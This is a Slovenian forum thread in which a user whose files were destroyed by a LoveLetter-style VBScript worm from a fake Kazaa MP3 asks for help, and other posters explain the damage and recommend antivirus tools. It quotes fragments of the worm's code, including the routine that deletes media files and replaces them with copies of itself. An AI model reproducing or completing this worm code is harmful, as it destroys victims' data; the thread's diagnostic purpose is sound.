» »

virus problem

virus problem

DrSergioDJ ::

Problem: S Kazaa-jem sem si potegnil en "kao" mp3 fajl, ki je bil velik 10kb in je naredu sam pizdarijo. Pri vseh *.jpg, *.mp3 fajle mi je dodal koncnico .vbs, in jih spremenil v velikost 10kb. MP3-je sem lahko se resil, ker jih je samo skopiral, tudi z vecino slik je bilo tako, vseeno pa je ostalo se kar nekaj slik, ki so ostale le kot *.jpg.vbs in ni NIKJER original slik !!! ;(( Ob temu mi noce instalirat Mcafee najnovejsega demota, pa se program files in nekaj ostalih map ( dodaj/odstrani programe ) je cisto zbrkanih ( kr neki so zmedene ). Kaj mi je storiti. Pa ne rect format!!!!!
...

Mercier ::

Mislim, da sem to že nekje videl. V notepadu odpri *.vbs, če je tisti ki ga mislim, bo notri pisalo kateri je. Ni ravno škodljiv, je pa lačen:D, ko si sam videl. Cepivo je brisanje. Poišči še ostale datoteke z isto vsebino.

salesky ::

Zivjo!
Probaj s Antivirusom F-prot (pazi mora biti za DOS). Tko pozenes in obkljukas da ti desinfekticira in poglej ce ti je počistilo. Program pa MORA bit DOS verzia!

DrSergioDJ ::

hmm, ja, brisat ni lih problem, sam ene par fajlov je pa kr slo....a so kaksne sanse, da jih dobim nazaj?

p.s.

tole je par prvih vrstic, ce odprem v notepadu :

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")


kaj pomaga/pove?
...

DrSergioDJ ::

evo, se neki:

so.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
...

Mercier ::

Nisem neki znalac, mislim da nazaj ne boš dobil nič. Vprašaj programerje na forumu.

Vsebina datoteke je po napadu le še skriptni VB.

BigHugo ::

DrSergioDJ: A je možno dobiti to datoteko, ki ti je okužila PC za namene testiranje.

LP BigHugo
LP BigHugo

[t502] ::

evo, se neki:

so.DeleteFile(f1.path) - Zbrise datoteko
elseif(ext="mp3") or (ext="mp2") then - Ce ima datoteka .mp3 ali .mp2 koncnico
set mp3=fso.CreateTextFile(f1.path&".vbs") - Izbrise mp3 datoteko in naredi prazen text file
mp3.write vbscopy - Vpise text v prazno datoteko (text)
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2 - nastavi attribute
end if
-------------------------------------------------------------------

Tak da datoteko so zbrisane...no recovery

[t502]

DrSergioDJ ::

;((;((;((AAAAAAAAAAAAAAAAAA!!!!!!!!!!!!!!!!!!!! moje slike z maturanca!!!!!!!!!!!!!!!;((;((;((;((;(( sreca mila, da sm jih posnel na en cd enkrat za foro...jebiga, par fajlov je slo. kaj bi rabu, en okuzen fajl? ni vec, sve slo v bris-bris. zal
...

BigHugo ::

DrSergioDJ: A si imel zagnan kakšen antivirusni program? Če nisi, potem si si sam kriv. Žal je tako pri teh warez straneh, kar Kazaa je.

LP BigHugo
LP BigHugo

DrSergioDJ ::

vem da sm si sam kriv, jebat ga :D sej zdej tece norton, pa je najdl cca. 13.000 fajlov sam na C: ( winsi so pa na F: )
...

BigHugo ::

Dobra šola za naprej. Vedi pa, da tudi z NAV nisi 100% zaščiten. Poglej malo naokoli po tujih forumih.

LP BigHugo
LP BigHugo

DrSergioDJ ::

ja, bom, hvala.
...

Mercier ::

Iz tega dela kode se da prebrati in nekaj naslutiti kaj počne in počne to kar si videl, če pa kam shrani celo datoteko pa tu ne piše nič.

DrSergioDJ ::

bom pa vse pastiru, ce se kej najdem
...zal ne gre, norton ne pusti odpret. ce slucajno se kaj najdem, bom pastiru. hvala zaenkrat
...


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Replace text with file name - 1000 ×

Oddelek: Pomoč in nasveti
142480 (2102) johanblond
»

Preprosta *.bat skripta

Oddelek: Programiranje
81146 (928) lopov
»

Unix timestamp

Oddelek: Programiranje
162420 (1907) JeBelaCesta
»

Kako bi napisal .bat file, da bi ...

Oddelek: Programiranje
231833 (1279) AtaStrumf
»

vkljucevanje txt datoteke v ...

Oddelek: Programiranje
131493 (1269) webblod

Več podobnih tem